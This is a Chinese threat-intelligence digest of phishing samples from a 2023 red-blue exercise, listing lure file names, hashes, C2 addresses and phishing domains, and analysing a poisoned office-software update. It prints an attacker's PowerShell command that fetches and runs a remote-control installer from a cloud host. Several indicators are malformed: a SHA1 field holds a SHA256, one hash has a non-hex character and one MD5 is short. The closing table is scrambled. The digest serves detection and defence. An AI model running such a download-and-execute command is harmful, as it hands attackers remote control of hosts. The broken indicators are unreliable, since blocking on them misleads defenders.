2023HW钓鱼邮件

以下内容来源于微步情报中心、奇安信威胁情报中心等

1.钓鱼样本:“单位职称人员情况统计表.exe”

  • MD5:6bc64ce49a6b27a91466353af78f977e
SHA256:7cee9a39a2f28db35f55257b24c3aebbff8597bfd7fa72057d54d4316a5464b9
发布C2:service-1kp2cmqp-1318310514.sh.apigw.tencentcs.com
分析结论:CobaltStrike木马

2.钓鱼样本:“**衡出轨事实.zip”

  • MD5:7deb36e4120a83b237f1d4424da21775
SHA256:e522fa4bbd3368bcfa27068a39e91e4d54128f784a47d9536a9cfdb6d4771e82
发布C2:123.207.50.117:80
分析结论:木马下载器

3.钓鱼样本:“**安全插件.exe”

  • MD5:7bffcee90e76ff7bc24da2ea33ca526d
SHA256:99fbce03fe5d20be405d6d42a289df53939fa9331e44794044de1af414486350
发布C2:[service-2fhc3nsz-1319935181.bj.apigw.tencentcs.com](http://service-2fhc3nsz-1319935181.bj.apigw.tencentcs.com)
样本特点:自定义算法和Base64解密计算shellcode
分析结论:CobaltStrike木马

4.钓鱼样本:“王*-简历+项目介绍.zip”

  • MD5:d5ab0006b70544e831ff3d571dad77a0
SHA256:d84393d72f58383884b07eb3217afed81375c3b377866e764abe6c9af9c33627
C2:ic.bfg.beg.cbc.9777fpl7.u86.lol
分析结论:木马下载器

5.钓鱼样本:“企业境外项目佣金中介费专项整治工作台账.exe”

  • MD5:77f998394d05de81d12df2ad93f102f3
SHA256:0296aac78725c033eb095a14bee754517ef38f30009da7ebc3f6cbaada537961
C2:service-1w8tfn9j-1318310541.sh.apigw.tencentcs.com
分析结论:CobaltStrike木马

6.钓鱼样本:“吴*妮-个人简历1.zip ”

  • MD5:5eb1ffcdcd98bbd47d20387aaef74d47
SHA256:58592e721499005bae84fd9955a61614a9e6b2f398aa16faa5585e2af77aa7ea
C2:abc.12346587.xyz
分析结论:CobaltStrike木马

7.钓鱼样本:“XX平台账号无法登录问题反馈”

  • MD5:fbbac1795b91061717853be953b8daa5
恶意样本C2地址:123.57.247.152
分析结论:CobaltStrike木马

8.供应链攻击GodzillaPlugin-Suo5-MemProxy

  • https://github.com/TonyNPham/GodzillaPlugin-Suo5-MemProxy

SHA256:
	90c2e60573b29d064f7f5e846051a5d5675915b6c97bea3bfd9ff8786dc3a324
MD5:
	fc0669c42c96fb9008faab07d5b8c4f3
SHA1:
	50fae2fb9b843eb958a5adf57bb1cfe764272886

以下使用360企业安全云

9.钓鱼样本:单位职称人员情况统计表.exe

  • MD5:6bc64ce49a6b27a91466353af78f977e
SHA256:7cee9a39a2f28db35f55257b24c3aebbff8597bfd7fa72057d54d4316a5464b9
C2:service-1kp2cmqp-1318310514.sh.apigw.tencentcs.com
样本特点:Python打包生成木马
分析结论:CobaltStrike木马

10.钓鱼样本:关于调整北***航空基层干部员工2023年7月份绩效考核结果的通知.7z

  • MD5:11ac373022d6297ea1f367d8980dc4bd
SHA256:eb0139f2fc44ab23afc2a46831a51f754c1467ba95c15c3bddbedda308a9b06f
样本特点:存在仿冒安全厂商的无效数字签名,采用AES算法在内存中解密执行恶意代码。
分析结论:CobaltStrike木马

11.钓鱼样本:万*集团采购计划.exe

  • MD5:e61e5f1264a63ea986978ec23b073919
SHA256:897a1331bc108b666776e3ea371553e1db0ccba8f27164fddd6e146645f5d287
分析结论:后门木马

12.钓鱼样本:针对金融行业的群发钓鱼邮件攻击分析

(来源: 奇安信威胁情报中心)

  • 攻击者发起钓鱼攻击的策略既有针对接收方定制钓鱼邮件内容

    • 以确保一击必中,也有用同一份内容广撒网,靠数量取得攻击成功的机会。

  • 红雨滴云沙箱近期捕获到针对金融行业的恶意样本

    • 同时红雨滴邮件威胁检测系统收到用户反馈的与之相关的钓鱼邮件。
    • 结合邮件内容和涉及多个机构的数十个收件邮箱地址,经分析研判确认是演习期间发生的针对金融行业的群发钓鱼邮件攻击。

  • 近期捕获的钓鱼邮件有:

    • 中国金融期货交易所-业务流程审批问题.eml
    • 金融期货信息系统(FFIS)登录显示系统崩溃问题反馈.eml
    • 两封钓鱼邮件的接收方为多家金融机构的数十个邮箱,附件压缩包中带有同一个可执行文件,只是文件名不同。

  • 其他演习相关的恶意样本还包括:

    • 伪装为Flash Player安装包的自解压文件“flashplayerpp_install_cn_web.exe”、
    • 用于内网攻击的LNK文件“新增专项..一览表.xlsx.download”等。

  • 部分演习相关样本红雨滴云沙箱/邮件检测报告列表

    • 样本名称 MD5 红雨滴云沙箱/邮件检测报告链接 备注
      中国金融期货交易所-业务流程审批问题.eml bec1f71138c4537c750b5e9bd0cf7aec 红雨滴邮件检测报告[1] 钓鱼邮件
      金融期货信息系统(FFIS)登录显示系统崩溃问题反馈.eml 900ad3f9d5367fc8515ef0abbd1cb193 红雨滴邮件检测报告[2] 钓鱼邮件
      中国金融期货交易所-业务流程审批问题.exe,金融期货信息系统(FFIS)登录显示系统崩溃问题反馈.exe 218ed8a350559707f1651d142328dc9b 红雨滴邮件检测报告[3] 附件压缩包中的恶意程序
      flashplayerpp_install_cn_web.exe f5194961f076bb296f9fc4f556ce6c63 红雨滴邮件检测报告[4] SFX自解压文件,包含域前置木马
      新增专项..一览表.xlsx.download 8838bd2b253ec9bde9b8ed1a29e5a495 红雨滴邮件检测报告[5] LNK文件

  • 案例:针对金融行业的群发钓鱼邮件攻击分析

13.钓鱼样本:关于公司OA系统更新的通知.exe

  • MD5:aa0834479c961565be81f7870c86ac8c
SHA256:cc283c106fbd931750e08dcb6a19b2f82204b6372dd2c4e831e37784194a0a9b
SHA1:6662de2aa45b8aec0eaed5d70634e597b11c2249
C2:139.224.17.133:80
分析结论:CobaltStrike木马

14.钓鱼样本:证券交易所网络安全检测客户端.rar

  • MD5:8177596214ca516e9a73ffcd2c13169b
SHA256:55f0658b744688922926a687852f61cfa7513dd003268e28280e5b7d1460db1a
C2:qq-1319693778.cos.ap-nanjing.myqcloud.com
SHA1:f9146fb6ec502dcf52e13cd9fbc551ef0d8a6529
分析结论:后门木马

15.钓鱼样本:供应商报名信息表、公司资质材料证明文件等汇总材料.exe

  • MD5:df0c068693d448a867c2cb8d156fe6f1
SHA256:a5255719e3d338aef784f642655716b1bc52e8156567d5059168b4496239a33e
SHA1:a5255719e3d338aef784f642655716b1bc52e8156567d5059168b4496239a33e
C2:ksu-1312459886.cos.ap-guangzhou.myqcloud.com
样本特点:MinGW打包的CobaltStrike木马
分析结论:CobaltStrike木马

16.钓鱼样本:账户安全防护软件.zip

  • MD5:e7083c7f08f6162b9b24bee8e17f607e
SHA256:3c10309a7e39b08bbdf753a60a28bdf59bec9830e8db60e305f0a84fa5ffc797
C2:39.105.130.94:80
SHA1:4be943c8eb588f58a85cf55257a747d93cf99bbc
分析结论:CobaltStrike木马

17.钓鱼样本:吃瓜吃瓜某司地区办总经理干某性骚扰和精神压迫女员工.exe

  • MD5:548d5cb90aa47b857cefca6191f4c253
SHA256:f74a604f6b5b7303aa3b71f39a5e1514f741fbe64a55b3c5e9a949ee173205d4
C2:8.130.133.138:443,8.130.133.138(ICMP)
SHA1:75fad61b12211alade5472f4d8909059a5160aad
分析结论:后门木马,ICMP隧道通信,同时利用Kubernetes服务。

18.钓鱼样本:企业境外项目佣金中介费专项整治工作台账.exe

  • MD5:5462c32ed537887401ba8d6fcb2bfd83
SHA256:54fb06778a2ae9c92a2ee6cc2d0a36ed51d8ff85efbdfb05ba5e2dcc5d2c8c51
C2:service-npbgee6g-1318291227.gz.apigw.tencentcs.com
SHA1:34bbc5f933d1ad90c1cac332b41bf9bec92af7d9
分析结论:CobaltStrike木马

19.演习相关样本信息(奇安信)

  • 软进行安全防护时一般会对进程链进行判断,而白程序加载其运行所需的DLL、资源、文件等无可厚非,因此杀软通常对已知的合法程序进程链存在一些放行操作。然而,由于白程序的导入表中只包含DLL名称而不包含路径,因此白程序在加载DLL时需要在磁盘上搜索DLL文件,并首先尝试从当前程序所在的目录加载。这种情况下,如果攻击者编写的恶意软件与白程序位于同一目录或指定的目录下,就可能导致DLL劫持的问题。由于加载的程序是已知的白程序,绕过了一些杀软的查杀,所以我们通常也将该手法称为白利用。

  • 在DLL白利用中,攻击者借助于白程序加载并运行放置在特定目录下的DLL文件,借此绕过某些安全检测和防御机制,从而在受害系统中执行恶意行为,如窃取敏感信息、植入后门、执行远程命令等。

  • 红雨滴云沙箱近期捕获的一些白利用样本包括:

    • 2023第三季度绩效自评.zip”,
    • 以学铸魂、以学增智、以学正风、以学促干有关重要论述.rar”,
    • 招标投诉反馈附件.zip”,
    • 关于上海中检内部疫情谣言控制的通知.zip”等。

  • 其中“2023第三季度绩效自评.zip

    • 通过诱使受害者点击压缩包中伪装成文档的LNK文件
    • 触发放置在解压文件夹其他位置的木马程序
      • 并且攻击方对放置木马程序的文件夹设置了隐藏属性
      • 加上LNK文件的扩展名”.lnk”也不会直接出现在文件资源管理器的界面中
      • 再配合与文件名称相符的图标,使得攻击者生成的LNK文件极具迷惑性。
    • 而LNK文件直指隐藏文件夹中的白程序。

  • 部分演习相关样本红雨滴云沙箱报告列表

    • 样本名称 MD5 红雨滴云沙箱报告链接 备注
      2023第三季度绩效自评.zip d0eb7f2597b03bfc79bba90dfadcc53c 红雨滴云沙箱报告[2] 白利用
      ***以学铸魂、以学增智、以学正风、以学促干有关重要论述.rar 31e1ac11ba92dfb849afd98c7e8295bc 红雨滴云沙箱报告[3] 白利用
      招标投诉反馈附件.zip 6d906d36bc92aaef2809ae8645a169d9 红雨滴云沙箱报告[4] 白利用
      关于上海中检内部疫情谣言控制的通知.zip 28c791891b0609297b8d1b72c5c8ae6a 红雨滴云沙箱报告[5] 白利用

  • 案例:白利用的攻击样本分析

    • 样本基本信息

    • 红雨滴云沙箱报告链接 https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AYn38Tlq9kNObtGx160K
      样本文件名 2023第三季度绩效自评.zip
      样本MD5 d0eb7f2597b03bfc79bba90dfadcc53c
      样本类型 Compressed Archive File in zip Format
      样本大小 611562字节
      RAS检测结果 Contain_PE64 Maybe_Sideloading Signed_PE ZIP_LNK en-US neutral-lang
      样本基因特征 解压执行 检测沙箱 探针 检测虚拟机 HTTP通信 持久化

20.没节操的钓鱼攻击

  • 演习进入第二周,微步云沙箱S捕获了数百个针对性的钓鱼文件

    • 其中多数是CobaltStrike(以下简称CS)木马。

  • 在这些钓鱼攻击中,攻击队使用了各种迷惑性的主题

    • 如简历、零日、安全工具、吃瓜、骚扰、曝光、
    • 补贴、通知、问题反馈、绩效考核、薪资等

  • 钓鱼方向和社工高度相关。

    • 比如,这是其中一个试图以社保信息为饵,进行钓鱼攻击的案例。
      • 在这个钓鱼攻击中,攻击队伪装人力资源部
      • 向目标发送社保相关“通告”,引诱目标打开恶意附件。
    • 附件是一个加密压缩包,包含一个图标伪装文档的恶意可执行文件
    • 为了迷惑受害者,打开之后会出现一个看上去像那么回事的文档,文档内容和邮件主题内容呼应,简直做戏做全套。
    • 对附件进行分析后,可以看出场景标签包含“CobaltStrike检测”,说明是CS木马。
    • 在“CS场景检测”模块,还可以看到该样本在情报、静态、网络行为和流量这几方面都呈现了CS相关特征。
    • 至此,可以确认此样本是CS木马。同时,我们可以使用行为检测、情报检测、配置提取、多维检测、引擎检测、静态分析、动态分析等模块对样本进行进一步分析

  • 温馨提示,在演习或日常工作中,如遇邮件或IM钓鱼,或发现可疑文件,都可以上传至微步云沙箱S进行快速分析检测。如果样本不便公开,可在上传时选择隔离样本。

  • 钓鱼情报

    • SHA256 文件名
      94e1f855be8f5a8477029601f8c44c0c120de8779c812bb86f9f9c3893baa4a9 关于统一2023年度各项社会保险缴费工资基数上下限的通告.rar
      f141a7c765f3bd6f80968a934a778bdf4f0267adbec1fd60b448ac1de2c05622 简历—157573600—计算机(广州)(1).rar
      40ef0deec0f87b5abfb6ed3eaa24671c062ae71ca4e9ce61bf97c6c84080fd8c 关于“中***”微信视频号发布短视频的信息说明.exe
      7f7990d7caebf089b056555f2e6c6519d58c38e0aa8276322c11175bfa3c987e 关于官网注册后信息有关问题的反馈.exe
      cd6ac4b9ad9be2ba5839aef2b1c76ed94ab19722f3e35826eb0fbe704f745aa0 举报信**主管张*彪涉嫌性骚扰.exe
      c157dcaf62e026ba3f2bf42db4996de5714165913b6353f20b4ed397df9f3ca6 高温补贴-人员信息收集表.xlsx(请勿外传).exe
      d758f2fb9cecf2ef3eb39b23290aedbd8375038f7254434c4f781e095aaf146a 工**部-薪资信息表-马*桐(保密)(解压密码:企业域名).exe
      e8d31c5e2967aab4745f9ddc00a31779f004d048de86391b4fbd622ab3269772 java程序员-简历-宋*全.docx.exe
      70927bc8f82f9c3af92e907ae6f655bd22215607270055dba1230a3a816b1831 金融**信息系统(FFIS)登录显示系统崩溃问题反馈.rar
      4bb74d81e4e09621b7b9f4182899fc372fade3ecd2221bd709efdc37817a3340 附件1:Windows邮件客户端升级教程.exe
      eb0139f2fc44ab23afc2a46831a51f754c1467ba95c15c3bddbedda308a9b06f 关于调整北***空基层干部员工2023年7月份绩效考核结果的通知.7z
      371e893ea727d7c5a44d3ebe082db98a10912f6b722d1ec5d22071d7535a3af1 “护航**”网络安全专项整治行动方案.zip
      5a9930add001fc715b5c93fc1ef49e54cc53642b89fa95cda7d2ada522b50280 99个震惊世界的未解之谜!! .zip
      e0304d84391c3aaf0576e40baedfcb50a226820b3f75cfc63570095ab1305a3c flashplayerpp_install_cn_web.exe
      47b8ce7c055af1cb548324aa7d8bd0e0184e4e6dfd69161ab4277b0bb668cdbe 奇*信专杀工具.rar

21.一线攻防回顾(腾讯)

1).热点漏洞攻击事件线索整理

  • 近日,腾讯安全攻防研究团队在云上捕获一起利用已知RCE漏洞变种的攻击事件,危害较大

  • 目前基本确认归属HOT“重保漏洞”

  • 文件名 ● eopi.jpg● qys.jpg● aqqa.txt● scjk.jsp
    IOC http//*.oast.site

  • 应对策略建议

    • 检查落盘文件格式,排查DNS日志是否出现相关文件和可疑IOC地址
    • 禁止上传会被web服务解析的文件(上述文件名)。厂商默认帐号、默认密码

2).今日热点高危可疑攻击IP

  • 以下IP建议临时封禁(建议24小时内,并基于告警情况调整策略)

  • IP地址 地理位置 更新日期
    61.221.110.206 中国,台湾省 2023/8/15
    123.56.122.132 中国,北京市 2023/8/15
    123.56.235.163 中国,北京市 2023/8/15
    104.234.140.96 美国,弗吉尼亚州 2023/8/15
    104.234.140.88 美国,弗吉尼亚州 2023/8/15

3).热点钓鱼情报

  • 热点钓鱼URL归属host 钓鱼网站类型
    gpdgug.top
    ghetda.top
    zytpzp.top
    yubydg.top
    yehdgk.top
    xuetp.com
    xiocx.com
    ufmknz.top
    rdhsdu.top
    punfgs.top
    pspjnh.top
    nhtpsg.top
    neyheg.top
    ftnzdt.top
    frtahd.top
    fhdtzn.top
    fdczyj.top
    ctzgjn.top    		 邮箱信息收集类钓鱼

22.钓鱼样本

  • MD5:6d906d36bc92aaef2809ae8645a169d9
SHA256:2ac81515a31d51d1fe5b1b72911f0dd3bef420e253c6ed1728b3650ec85b759f
SHA1:a3e3d006ee711a47be58fdc36b6dd3d5a36dba59
C2:static.cgbchina.com.cn.cloud.360.net.cdn.dnsv1.com
样本特点:域前置
分析结论:后门木马

23.钓鱼样本

  • MD5:7ceaee96aa3e717f6e66a6b7611867a4
SHA256:b234cb3de4dd40d18ca3c80b96ef44dabc477a4ae9fd341cac9adb4ee863c9eb
C2:36.139.109.28:28219 36.139.109.28:8085
SHA1:06f5cadfc1398f4fb2176f15186d387402809b85
样本特点:通过Loader加载CS
分析结论:CobaltStrike木马

24.钓鱼样本

  • MD5:548d5cb90aa47b857cefca6191f4c253
SHA1:75fad61b12211a1ade5472f4d8909059a5160aad
SHA256:f74a604f6b5b7303aa3b71f39a5e1514f741fbe64a55b3c5e9a949ee173205d4
C2:8.130.133.138:443,8.130.133.138(ICMP)
样本特点:ICMP隧道通信,同时利用Kubernetes服务。
分析结论:后门木马

25.钓鱼样本

  • MD5:5462c32ed537887401ba8d6fcb2bfd83
SHA1:34bbc5f933d1ad90c1cac332b41bf9bec92af7d9
SHA256:54fb06778a2ae9c92a2ee6cc2d0a36ed51d8ff85efbdfb05ba5e2dcc5d2c8c51
C2:service-npbgee6g-1318291227.gz.apigw.tencentcs.com
分析结论:CobaltStrike木马

26.演习相关样本信息(奇安信)

  • 网络防守方需要及时对发现的安全事件进行处置,而这一点也变成了攻击者的可趁之机

  • 此前红雨滴云沙箱捕获到多个以“安全检查工具”为伪装的恶意样本

    • 近期又发现攻击者借安全事件处置之名向某单位发起定向攻击

  • 我们推测受害单位此前可能已遭受过一轮攻击

    • 使得攻击者借题发挥,仿冒安全厂商处置攻击事件,发起再次进攻的尝试。

  • 红雨滴云沙箱近期捕获的与演习相关的样本

    • 集团钓鱼事件处置方案v1.1_奇安信_20230815.rar”,
    • 奇安信专杀工具.exe”,
    • “附件2:第六届监事会第五次会议联络人人选拟定列表.docx.exe”,
    • 2023年学员培训中心-颁发证书错误异常反馈.exe”等

  • 其中“集团钓鱼事件处置方案v1.1_奇安信_20230815.rar

    • 通过诱使受害者点击压缩包中伪装成PDF文档的LNK文件运行恶意程序
    • 然后打开诱饵文档,并启动木马。

  • 部分演习相关样本红雨滴云沙箱报告列表

    • 样本名称 MD5 红雨滴云沙箱报告链接 备注
      ***集团钓鱼事件处置方案v1.1_奇安信_20230815.rar eafdce31c94e289e64a1112f54a15318 红雨滴云沙箱报告[1] 带有恶意程序的压缩包
      奇安信专杀工具.exe 1914d2f8b4b9a37646f7c765c13cf425 红雨滴云沙箱报告[2] 压缩包中的木马
      11.zip fe4625e080ccaa89d02fdf8c63f1793 红雨滴云沙箱报告[3] 压缩包中的白利用木马
      附件2:****第六届监事会第五次会议联络人人选拟定列表.docx.exe 80de75da2dfdad7f5156532303f3f917 红雨滴云沙箱报告[4] 域前置木马
      2023年学员培训中心-颁发证书错误异常反馈.exe fbcf57bff0c8669621a24b93ba5caed3 红雨滴云沙箱报告[5] 木马

  • 案例:借安全事件处置之名的攻击样本分析

    • 样本基本信息

    • 红雨滴云沙箱报告链 https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AYn8VRVHCf0-QUp-8zGW
      样本文件名 ***集团钓鱼事件处置方案v1.1_奇安信_20230815.rar
      样本MD5 eafdce31c94e289e64a1112f54a15318
      样本类型 Compressed Archive File in zip Format
      样本大小 31254087字节
      RAS检测结果 Contain_PE32 Contain_PE64 RAR_LNK Signed_PE en-US neutral-lang
      样本基因特征 可疑命令行 检测虚拟机 检测沙箱 探针 漏洞利用 解压执行 可疑程序 持久化

26.8月16日钓鱼样本相关信息(腾讯安全)

  • 从已捕获的数攻击事件来看,攻击者主要的伪装钓鱼方式为简历、财务相关通知,建议用户排查。

    • 同时,近期云函数利用的攻击方式增多,之前友商的发布的公有云范围较为狭隘
    • 腾讯安全攻防研究团队已追踪并协助用户阻断、溯源多起利用其他公有云函数的威胁事件

  • 整理出以下热点情报

    • 样本md5 文件名 IOC
      91246cf867db44c5a9e14ff078da489d 2023税务局通知 财务人员的春天.zip wts2023815.oss-cn-hangzhou.al**cs.com
      9a1b5045cf3e881d3baf975536513616 财务人员的春天财政部最新通知.rar wts2023815.oss-cn-hangzhou.al**cs.com
      aa354342eca8b374eca436c86dbb88bd 关于社保报销制度调整的通知 2698.exe wts2023814.oss-cn-hangzhou.al**cs.com
      3de08c17aa4cf7d40bf1251ffecb20fa 2023关于减免企业及个人所得税通知.exe -
      54d651f26dfaf6ead1be42ca1dfdb4c6 2023关于减免企业及个人所得税通知.exe -
      4b160382fda9cfc19bc7598003fecfbf 2023税务稽查名单.zip -
      6b027bd3f4d48ee5aa167c64d060ed1d 2023下半年税务新政策改革通知!.exe -
      00d1ba418d537e5454fa09f11468f035 个人简历(已加密).exe -
      062f8f4f704090b1c4308e23eee093d java程序员-简历-宋全.docx.exe -
      d4c5cb0fea35f9b3b3fbd12f615d85ff 内部福利优惠券.zip -
      4454b0da199181d45370fbf03def4b30 2023年薪资调整[电脑版].rar -

27.WPS云端官方升级文件被投毒

  • 8月16日11时左右WPS云端官方升级文件被投毒

    • 为攻击队注册的阿里云助手软件(远控程序)

    • 请检查Windows终端是否存在阿里云助手软件(进程名为aliyun_assist_service ,文件名为aliyun_agent_latest_setup.exe)。

    • 并在终端安全管理后台将以下阿里云助手哈希值和恶意程序C2地址加黑:

      • MD5值

        • 19312308e9be6870940cba6ace80ef99
7e2591d7ae8d76b7bd8c3494fd2b4e0b
b579d877a4db464dd44e5ca0b1fbb066
2fbb09d89feb1a77c6cd9a9c4a8a5b97
2589acfcdb9165de1b0c44b50e8427c0
803f46e9b0f68701754488560d1f2dcd
5364cef66c2948ae66fb01c12595f74b
4105835f26727ec0bc3270280391c499
dda4c8f26fd3856aea2ffa6fe0f428ee
e5e1a47e0f080212a40fa9ce73574f21
0ad367f30415c2fb6da697e25bd702c2
e270aa663d792528a6b7f48dfdfb9df4
0d4e1e65fcde8e955b52291f4f37145e
6804651c0576aaa668cbc06a124225cd

      • C2地址

        • 39[.]98.177.61
182[.]92.210.30
k3b0615l9cmeyvsxz8ohmsm22.oss-cn-shenzhen.aliyuncs[.]com

28.腾讯安全针对投毒事件的分析

  • 研究团队发现一起针对官方办公软件W投毒事件,并应受害用户邀请。

  • 基于腾讯安全威胁情报能力,对样本进行了深度分析和攻击流程梳理,完整还原了威胁事件发生过程。

  • 以下为事件还原和响应建议策略

    • 用户A,客户终端机器上突然启动某公有云助手软件(进程名al*_assist_service)

    • 威胁分析师结合现场木马加载器w_update_loader.exe进行了分析

    • 样本MD5

      • 5cb7d2c90f772730bbaae5682033279c
299e99002e12a97dfb325220261c200b

  • 基于威胁情报分析,确定了样本的潜伏期时间线

    • 8月1日,攻击样本的最早投递时间,但当时下载服务端口处于关闭状态,沙箱无法定位后续行为记录。
    • 8月10日与8月16日陆续出现失陷机器;
    • 8月16日下载服务开启后,失陷机器获取shellcode执行后续行为被感知到。

  • shellcode详情无法主动探测到且无法复现,但是从客户端行为可以推测

    • 攻击者通过安装AL云助手将非AL云的服务器注册为AL**托管实例

      • 实现对失陷主机的远程控制。

    • 攻击者生成安装脚本的过程分析(Windows 为例)

      • Invoke-WebRequest -Uri `
'https://xxxxxx.ali***cs.com/windows/ali***_agent_latest_setup.exe' `
-OutFile 'C:\\ali_agent_latest_setup.exe'&"C:\\ali_agent_latest_setup.exe" '/S' '--register' `
'--RegionId="cn-hangzhou"'

    • C2地址

      • 39.98.177.61:8000
47.97.165.146:8000

    • MD5:

      • 9cd92e378de5a9f2cdced65bd5a08a31

    • 攻击路径推测

      • 基本确定是利用办公软件W云共享同步为攻击入口
        • 攻击者拿到办公软件W的账号之后往云共享空间上传恶意文件
        • 并指定同步到终端的地址,实现样本投递
      • 利用主机进程的加载服务实现正常程序加载恶意dll的白+黑路径,启动原始dll木马

    • 检查方式

      1. 立即排查外联历史记录是否存在上述C2地址,是则主机已失陷;
      2. 添加样本查杀规则,以确定落盘文件中是否存在上述MD5文件。若是,则主机已受影响;
      3. 如本地确已安装办公软件W,请立即在涉及的终端检查版本,若为8月16日前后升级,但并未更新至最新版本,则主机已受影响,需进一步排查第1、2项。

    • 应对建议

      • 请立即检查办公软件W的版本,并更新至最新官方版本(最新补丁会主动删除恶意植入的AL*云助手软件)并排查失陷主机的其他可疑行为。

29.红蓝对抗期间钓鱼IoC

样本主题 MD5 sha1 SHA256 C2 样本特点 分析结论
[ "*擎 V10
紧急修复
工具和相
关问题方
案上报详
情-
20230807.
exe"]		 34d8969a381957b70
bb7873f115407fbd1
db892a0793548aecd
4e6f8649e6941		 39.99.145.136:443
39.99.145.136:6293		 后门
木马
简历.exe 10a1b8c85242444c3
009d81d6db5a6dc82
e34739b225cc16ae1
34c8f89dd9e68		 后门
木马
简历.exe 0e8fa671ccf765236
665e8c61ef4e7d3b0
be37482f466fce9de
f4f72703806af		 154.64.61.74:7777 Coba
ltSt
rike
木马
**衡出轨事
实.zip		 7deb36e41
20a83b237
f1d4424da
21775		 e522fa4bbd3368bcfa
27068a39e91e4d541
28f784a47d9536a9cf
db6d4771e82		 123.207.50.117:80 木马
下载
王*-简历+
项目介
绍.zip		 d5ab0006b7
0544e831ff
3d571dad77
a0		 d84393d72f58383884
b07eb3217afed81375
c3b377866e764abe6
c9af9c33627		 ic.bfg.beg.cbc.9777fpl7.u86.lol 木马
下载
企业境外
项目佣金
中介费专
项整治工
作台
账.exe		 77f99839
4d05de81
d12df2ad
93f102f3		 0296aac78725c033e
b095a14bee754517e
f38f30009da7ebc3f
6cbaada537961		 http://service-1w8tfn9j-1318310541.sh.apigw.tencentcs.com/ Coba
ltSt
rike
木马
吴*妮-个人简
历 1.zip		 5eb1ffcdc
d98bbd47d
20387aaef
74d47		 58592e721499005ba
e84fd9955a61614a9
e6b2f398aa16faa55
85e2af77aa7ea		 abc.12346587.xyz Coba
ltSt
rike
木马
关于在招标
过程中存在
不公平问题
的反馈
2023081157
9856279582
755352523.
exe		 edd6a602f
0b6f74a6b
dd0a03cc3
859ba		 03a541d79b68c384ac
16342bfe4746e7c1cfa
dc0306debafe6351a74
b3fa046b		 36.139.5.189:27629 使用开源的
shellcode
加载器。		 后门
木马
北京朝阳区
****有限公
司采购财务
软件需
求.exe		 95aa6172
6e5dc7c3
608f307f
01786713		 80e5d125f05fb4ff819
f2429f2ba49c02d6bb0
cadf7c292d862483dd3
9125e5c		 http://picture-image.oss-cn-huhehaote.aliyuncs.com/ 多种反沙箱
技术		 经过
改写
的内
网穿
透工

(FRP
)
关于集团及
下属分公司
总部的通
知.exe		 263cf72a
23795a44
a77f5391
36a54d9f		 db27686029c129cdc7
4de612d2df2e68a2d4
36eb621e6271f7f65bd
a55ce6385		 http://dfmc-static.oss-cn-heyuan.aliyuncs.comuncs.com/ Coba
ltSt
rike
木马
单位职称人
员情况统计
表.exe		 6bc64ce49
a6b27a914
66353af78
f977e		 7cee9a39a2f28db35f5
5257b24c3aebbff8597
bfd7fa72057d54d4316
a5464b9		 http://service-1kp2cmqp-1318310514.sh.apigw.tencentcs.com/ Python 打包
生成木马		 Coba
ltSt
rike
木马
万*集团采
购计划.exe		 e61e5f12
64a63ea9
86978ec2
3b073919		 897a1331bc108b6667
76e3ea371553e1db0c
cba8f27164fddd6e146
645f5d287		 后门
木马
大学-智
能科学与技
术-硕士-张
菲.exe		 111beb09f
39865c4e2
a4ef8ac3b
b2163		 ed7cec7ba09b448e749
710c0ee427fa098f05e
e3bd831d7ba2cf32336
4be669d		 47.99.189.149:443 ICMP 隧道通
信,同时利

Kubernetes
服务。		 后门
木马
关于加强防范
钓鱼邮件的通
知.exe		 8a97ca3bd
fdc36b62f
bef20036d
3c26e		 91a1d74f0c48309e354
e35e1a251e700289a03
736a2998f20ddeb07a2
d64f4b7		 123.60.143.127:443 ICMP 隧道通
信,同时利

Kubernetes
服务。		 后门
木马
中国*********
交易所-业
务流程审批
问题.exe		 218ed8a35
0559707f1
651d14232
8dc9b		 5dfcacaed6079cc4f62
3bcc1885367d7b52938
653b16e3c49688adf14
db2a7dd		 124.71.5.184:443 ICMP 隧道通
信,同时利

Kubernetes
服务。		 后门
木马
供应商报名
信息表、公
司资质材料
证明文件等
汇总材
料.exe		 df0c06869
3d448a867
c2cb8d156
fe6f1		 09078f61680
babc02ef478
e9ca078b3cb
2ee51bc		 a5255719e3d338aef78
4f642655716b1bc52e
8156567d5059168b44
96239a33e		 http://ksu-1312459886.cos.ap-guangzhou.myqcloud.com/ MinGW 打包

CobaltStri
ke 木马		 Coba
ltSt
rike
木马
账户安全防
护软件.zip		 e7083c7f0
8f6162b9b
24bee8e17
f607e		 4be943c8eb5
88f58a85cf5
5257a747d93
cf99bbc		 3c10309a7e39b08bbdf
753a60a28bdf59bec98
30e8db60e305f0a84fa
5ffc797		 39.105.130.94
:80		 Coba
ltSt
rike
木马
关于公司 OA
系统更新的
通知.exe		 aa0834479
c961565be
81f7870c8
6ac8c		 6662de2aa45
b8aec0eaed5
d70634e597b
11c2249		 cc283c106fbd931750e
08dcb6a19b2f82204b6
372dd2c4e831e377841
94a0a9b		 139.224.17.13
3:80		 Coba
ltSt
rike
木马
***证券交
易所网络安
全检测客户
端.rar		 817759621
4ca516e9a
73ffcd2c1
3169b		 f9146fb6ec5
02dcf52e13c
d9fbc551ef0
d8a6529		 55f0658b74468892292
6a687852f61cfa7513d
d003268e28280e5b7d1
460db1a		 http://qq-1319693778.cos.ap-nanjing.myqcloud.com/ 后门
木马
招标投诉反
馈附件.zip		 6d906d36b
c92aaef28
09ae8645a
169d9		 a3e3d006ee7
11a47be58fd
c36b6dd3d5a
36dba59		 2ac81515a31d51d1fe5
b1b72911f0dd3bef420
e253c6ed1728b3650ec
85b759f		 http://static.cgbchina.com.cn.cloud.360.net.cdn.dnsv1.com/ 域前置 后门
木马
关于在招标
过程中存在
不公平问题
的反馈-
2023081414
0092859875
7370798528
93079.exe		 7ceaee96a
a3e717f6e
66a6b7611
867a4		 06f5cadfc13
98f4fb2176f
15186d38740
2809b85		 b234cb3de4dd40d18ca
3c80b96ef44dabc477a
4ae9fd341cac9adb4ee
863c9eb		 36.139.109.28:28219
36.139.109.28:8085		 通过 Loader
加载 CS		 Coba
ltSt
rike
木马
吃瓜吃瓜某
司地区办总
经理王某性
骚扰和精神
压迫女员
工.exe		 548d5cb90
aa47b857c
efca6191f
4c253		 75fad61b122
11a1ade5472
f4d8909059a
5160aad		 f74a604f6b5b7303aa3
b71f39a5e1514f741fb
e64a55b3c5e9a949ee1
73205d4		 8.130.133.138:443
8.130.133.138 (ICMP)		 ICMP 隧道通
信,同时利

Kubernetes
服务。		 后门
木马
企业境外项
目佣金中介
费专项整治
工作台
账.exe		 5462c32ed
537887401
ba8d6fcb2
